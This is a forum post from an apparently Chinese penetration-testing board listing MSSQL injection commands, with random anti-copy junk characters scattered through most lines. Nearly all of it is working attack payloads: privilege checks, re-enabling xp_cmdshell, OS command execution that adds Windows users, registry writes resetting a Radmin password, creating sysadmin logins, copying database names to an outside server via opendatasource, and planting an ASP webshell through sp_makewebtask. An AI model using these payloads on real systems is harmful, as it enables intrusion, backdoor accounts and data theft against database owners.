找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 阿D常用的一些注入命令
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1763|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
+ @9 X4 O2 X, ^8 L% `- G, A0 d//看看是什么权限的
( n# x5 b+ P0 g( h7 r) J% b7 wand 1=(Select IS_MEMBER('db_owner'))# `6 W7 u# d1 {% |8 ~. y  J+ D
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--+ @- Q0 B2 I* F! o$ G

1 }( w( p6 [! z//检测是否有读取某数据库的权限6 ~: d' U! v! e( }- J( ]1 w
and 1= (Select HAS_DBACCESS('master'))+ |0 o! Z) }- |6 Z9 t
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
4 E- f6 Y+ ]  {( S8 u/ n' C! ?% f; M/ I! L/ q6 T% `

2 l$ t6 O- u& q$ O3 w% v数字类型) k% O/ P/ w2 m3 a( l$ D" Z" v: w
and char(124)%2Buser%2Bchar(124)=0* G0 z/ A: r* U8 G, F7 c* j- T

2 S# n7 g& Z" O9 q1 [. l# j字符类型: h( F: ^7 B3 k' ~3 l5 |
' and char(124)%2Buser%2Bchar(124)=0 and ''='
3 u, b0 z+ |7 \/ q: Z1 \; V$ r7 b  v0 C
搜索类型
! g% h& D* O' N' and char(124)%2Buser%2Bchar(124)=0 and '%'='
* o# {3 y. ?1 b0 {+ E3 G+ w- u* l6 l2 C5 P& M6 V8 E1 ^) J# }# |
爆用户名( ]6 F0 _( ^, K- @( S; ?! {- i. N
and user>0# ?' _$ G" L: E( S; V" u9 x! w
' and user>0 and ''='  X2 l: a# B+ w, b5 l

* e3 r7 ]) a- u6 C+ }& z5 N0 @$ E% H检测是否为SA权限, b6 Y: p* e7 e$ M' w6 e3 ?7 ~
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--0 e* i7 J- _5 x: w* F- p
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --; [5 r5 ~' Y- v+ H1 Y8 R

% J4 x- `& P6 Q7 ]% d8 g, u8 A4 y检测是不是MSSQL数据库
& e. Q5 r5 _* ~0 d$ f6 _and exists (select * from sysobjects);-- - Q) f: O" P, T) G2 Y4 I

" t/ _" n4 l1 q. R; v检测是否支持多行
# n, r4 ~9 a( a( @;declare @d int;-- $ W6 K+ X6 d0 v# W; o
+ l7 w- \- z" l9 n
恢复 xp_cmdshell6 V) J" d0 p! Q: U; _; i
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
" ?7 |( Y9 X4 F1 Q5 l4 l. t6 y5 D4 z, }4 D& Z

. h, `# D" r2 i0 A0 A; {select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
4 ]: G+ r5 E2 z! j/ n- r2 r; {1 ~7 i" ^$ E
//-----------------------
- d8 q. n) M* b- [; w//      执行命令
3 V- o" Y" {5 _9 q//-----------------------
3 C4 K+ m* l! ^2 J% m首先开启沙盘模式:
* k* q0 ~% V# u8 Y3 ?: eexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
6 o& V! j) U9 C+ M, E* O! K- g3 [7 a% }# Z
然后利用jet.oledb执行系统命令
6 L3 L" {9 J& E& u  k( pselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
! z$ ~- v: b$ {" T5 Y: c, `  `+ v" I* m& |6 M7 K
执行命令# Z. S: n/ ^9 w* a! i# ?
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
- e( v0 q; Q. L
/ o; O+ J& r) D+ {; Z+ kEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111', f- M" S) ^9 i- d. G- e3 _
2 \& i6 X+ Q- v* Z% S1 R
判断xp_cmdshell扩展存储过程是否存在:
+ D  {2 V/ m9 m1 O! n$ R9 ahttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')( P* \4 F. c  \/ w0 ?. J
5 R0 @( j8 }, o0 O( a* j7 P
写注册表
! n+ `' C) B, B1 o0 P/ |" T8 m: Jexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
' t; E/ j. z6 E! _: |2 S2 @7 g- I) P4 Y
REG_SZ8 Q" G9 u% X! g/ ?
$ |4 u, r2 F+ E1 P, z4 W
读注册表
, A& l/ {1 i% A% f' Z2 ^- D: R: q% }exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
' b4 }9 |! O# F4 R/ u! d- I" d7 l! L: h2 }) {% A. q% I
读取目录内容
$ z$ E4 n. n2 {+ g2 h* rexec master..xp_dirtree 'c:\winnt\system32\',1,1
$ T) T# s% z5 ^
+ K6 ^) A( @4 A% H/ u8 |- h! x1 G5 g. U: |0 Q1 h& ~6 _
数据库备份
* i0 Z4 c5 k. h1 s5 Tbackup database pubs to disk = 'c:\123.bak'
4 l6 s7 S9 _5 f% [8 k% Y7 J2 [1 o
//爆出长度9 ^3 y6 Y- y; Q2 P/ O6 t# ~# F
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
; `/ W) i" q' z0 z' I# h8 e
' J) s' ]0 _, q; |6 e( w0 g! F" [$ s/ _( \; N& j

& ]1 L1 U! V2 ^3 O+ W更改sa口令方法:用sql综合利用工具连接后,执行命令:5 r; k6 Q- Z' x2 p7 d
exec sp_password NULL,'新密码','sa'
0 `& }7 C. r% i* u5 W* S) q
% u- f9 `- _9 K! b添加和删除一个SA权限的用户test:$ S7 G6 T% t  X' U6 _0 W- D" |
exec master.dbo.sp_addlogin test,ptlove
# ?/ M: [' p) o- y& u6 Fexec master.dbo.sp_addsrvrolemember test,sysadmin
! ]: e) m* R4 M
4 U4 \+ ~& r! {& k0 U删除扩展存储过过程xp_cmdshell的语句:
5 N% O" D( i* ~exec sp_dropextendedproc 'xp_cmdshell'
8 Q; [# s; N, o3 ]! R
) Y' V1 g3 O8 |  J& C  \添加扩展存储过过程/ ^/ x4 M( z, M4 f0 Q3 `1 S" r- d
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' # P7 o0 y; @& Z% t; r0 |
GRANT exec On xp_proxiedadata TO public ' _/ k; P2 K! Q" `
, k  X$ ?0 Q, X- P' F5 ^
+ P3 g- [7 \" Q3 b
停掉或激活某个服务。
& v2 Z' B8 L% M* E7 F" A5 G+ @" p* w/ ^, A
exec master..xp_servicecontrol 'stop','schedule'& o# a( R9 |2 b# J% r" Q
exec master..xp_servicecontrol 'start','schedule'7 g+ `4 Q* k% p; Z+ g
: I3 o" t8 t7 [( a5 s; |3 \
dbo.xp_subdirs: E) h& X# b" U' z1 V5 ]0 \

7 z- X7 s) D9 x7 u6 ~. p只列某个目录下的子目录。3 }4 z: P2 l! u' H
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
. f1 A# D" k  K8 P+ D; \0 I1 k# o7 `6 V
dbo.xp_makecab
& i, Q9 w; L# A' \; T
  Z7 a$ @3 Z- }将目标多个档案压缩到某个目标档案之内。
  F- }! A9 o1 u所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。3 \) g' n1 I: x; w8 u+ n. P) {- W. j

8 c9 s1 U4 L/ `6 Idbo.xp_makecab
: Q  _8 n# ~: z2 W$ [, z* r'c:\test.cab','mszip',1,
( O# l* g' d7 D, O- d0 c+ J'C:\Inetpub\wwwroot\SQLInject\login.asp',
- w+ {& V9 |8 t% z1 W3 q'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
+ D: v" k. b# G- g! D. {
# w( t8 V" n/ T" Rxp_terminate_process3 k8 V+ T& j* Y1 z' _, `* v- b
6 E' O. ?3 `2 p* S4 U
停掉某个执行中的程序,但赋予的参数是 Process ID。
& p: o. W+ f/ L7 |利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
( b6 T0 R- H0 [/ X2 B$ P: _+ a: r! j+ E1 q' v2 ?2 x3 d3 {
xp_terminate_process 2484
  I* ?  i' Q' w
* d  l1 F7 q. i( N& axp_unpackcab
* I; y7 w* B- K: q+ P" N* R  _+ t0 S+ Q
解开压缩档。5 ^8 y( D" E2 e! P/ ?1 J" j% b

/ m: ?, W4 W: t0 {xp_unpackcab 'c:\test.cab','c:\temp',1
, R! l# J0 p- H0 ~7 x2 K! ]! ^# x
" `4 ^/ M; T4 \& Z
2 H  ~$ ~' A1 ~- A& _9 H, M某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
% Z, E$ n; P2 C  p
  c& h1 l: I! l$ mcreate database lcx;
# O6 x9 s4 u; }0 _Create TABLE ku(name nvarchar(256) null);* G7 \2 F9 Q* G# L
Create TABLE biao(id int NULL,name nvarchar(256) null);
3 N* @! e; u7 U9 g
0 d) G5 j. A6 X6 |//得到数据库名
: @8 _/ ~2 x' _/ e" B4 Ginsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
" J# s( q. q( v8 R5 c- V0 a/ m9 `+ h" ^0 u. K4 J  N. W

6 ?) ?8 o. _( s/ B1 H: k; ^/ K//在Master中创建表,看看权限怎样
; h0 w& o5 w% o) h: q+ M% fCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--. e+ r5 \: f7 c+ x3 Z9 \3 E

" Q* Z4 e9 C7 A' O- @2 H用 sp_makewebtask直接在web目录里写入一句话马:
; S' E4 M, j9 t# C' Whttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--1 s% M2 F9 V4 R- U! U- [* O3 S

. O6 F& x8 R5 y) ?; O& |2 i9 z# \; h//更新表内容
3 |& O* V, [- X3 UUpdate films SET kind = 'Dramatic' Where id = 123# \7 ?0 h" q* z" t1 Z3 v

/ @' L( C+ H3 a$ c//删除内容! W7 k5 ?% G5 a- c" Y- A
delete from table_name where Stockid = 3
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表